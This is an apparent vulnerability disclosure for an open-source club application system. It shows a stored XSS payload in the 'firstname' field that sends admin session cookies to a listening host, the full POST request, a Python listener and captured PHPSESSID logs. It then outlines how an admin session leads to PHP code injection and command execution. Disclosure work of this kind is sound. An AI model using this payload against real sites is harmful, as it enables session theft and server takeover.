Unauthenticated Stored Cross-Site Scripting to HTML injection to RCE

Summary

While testing a Free and open-source software (FOSS) application, a flaw was identified where an unauthenticated threat actor could apply to join a book club, inject an XSS payload and steal application session cookies belonging to higher privilege level user accounts, including Admin and Club Admin. With the hijacked session cookie, logging in to the application as admin, it’s possible to add PHP code to the about-us and home page when a PHP shell can be input. system commands can be run from the web browser.

Proof of Concept

Unauthenticated Stored XSS

Manual walkthrough: Apply to a club and click on Submit Application

Direct approach: Navigate to the following URL http://localhost/scas/?page=clubs/application_form&id=7

Screenshot of the vulnerable input field:

Untitled

Insert the following payload in the firstname parameter

m1st3r3"><img src=x onerror="this.src='<http://127.0.0.1:8000/?'+document.cookie>; this.removeAttribute('onerror');">

The post request with the payload is here

POST /scas/classes/Master.php?f=save_application HTTP/1.1
Host: localhost
Content-Length: 1326
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEWvm4hOYmjUAAlLT
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: <http://localhost>
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: <http://localhost/scas/?page=clubs/application_form&id=7>
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close

------WebKitFormBoundaryEWvm4hOYmjUAAlLT
Content-Disposition: form-data; name="id"

------WebKitFormBoundaryEWvm4hOYmjUAAlLT
Content-Disposition: form-data; name="club_id"

7
------WebKitFormBoundaryEWvm4hOYmjUAAlLT
Content-Disposition: form-data; name="firstname"

m1st3r3"><img src=x onerror="this.src='<http://127.0.0.1:8000/?'+document.cookie>; this.removeAttribute('onerror');">
------WebKitFormBoundaryEWvm4hOYmjUAAlLT
Content-Disposition: form-data; name="middlename"

------WebKitFormBoundaryEWvm4hOYmjUAAlLT
Content-Disposition: form-data; name="lastname"

test
------WebKitFormBoundaryEWvm4hOYmjUAAlLT
Content-Disposition: form-data; name="gender"

Male
------WebKitFormBoundaryEWvm4hOYmjUAAlLT
Content-Disposition: form-data; name="year_level"

2022
------WebKitFormBoundaryEWvm4hOYmjUAAlLT
Content-Disposition: form-data; name="section"

test
------WebKitFormBoundaryEWvm4hOYmjUAAlLT
Content-Disposition: form-data; name="email"

[email protected]
------WebKitFormBoundaryEWvm4hOYmjUAAlLT
Content-Disposition: form-data; name="contact"

0123456789
------WebKitFormBoundaryEWvm4hOYmjUAAlLT
Content-Disposition: form-data; name="address"

------WebKitFormBoundaryEWvm4hOYmjUAAlLT
Content-Disposition: form-data; name="message"

------WebKitFormBoundaryEWvm4hOYmjUAAlLT--

Start a Python HTTP web server listening on port 8000 to capture the request

PS C:\\xampp\\htdocs\\scas> python -m http.server
Serving HTTP on :: port 8000 (http://[::]:8000/) ...
::ffff:127.0.0.1 - - [11/Apr/2022 22:54:46] "GET /?PHPSESSID=qvch5e9s97c9cfpsi23f2iureq HTTP/1.1" 200 -
::ffff:127.0.0.1 - - [11/Apr/2022 23:15:37] "GET /?PHPSESSID=qvch5e9s97c9cfpsi23f2iureq HTTP/1.1" 200 -
::ffff:127.0.0.1 - - [12/Apr/2022 10:26:35] "GET /?PHPSESSID=qvch5e9s97c9cfpsi23f2iureq HTTP/1.1" 200 -
::ffff:127.0.0.1 - - [12/Apr/2022 10:26:49] "GET /?PHPSESSID=qvch5e9s97c9cfpsi23f2iureq HTTP/1.1" 200 -
::ffff:127.0.0.1 - - [12/Apr/2022 10:32:01] "GET /?PHPSESSID=qvch5e9s97c9cfpsi23f2iureq HTTP/1.1" 200 -

Now when an admin or a club admin logs in and views the applications, the stored XSS is triggered and it’s possible to capture the session cookie. Once the cookie has been captured, it’s possible to log in as that user with the cookie.

HTML Injection

With the admin's session cookie, it’s possible to inject code into the index.php and about-us.php to manipulate the page and possibly get command execution.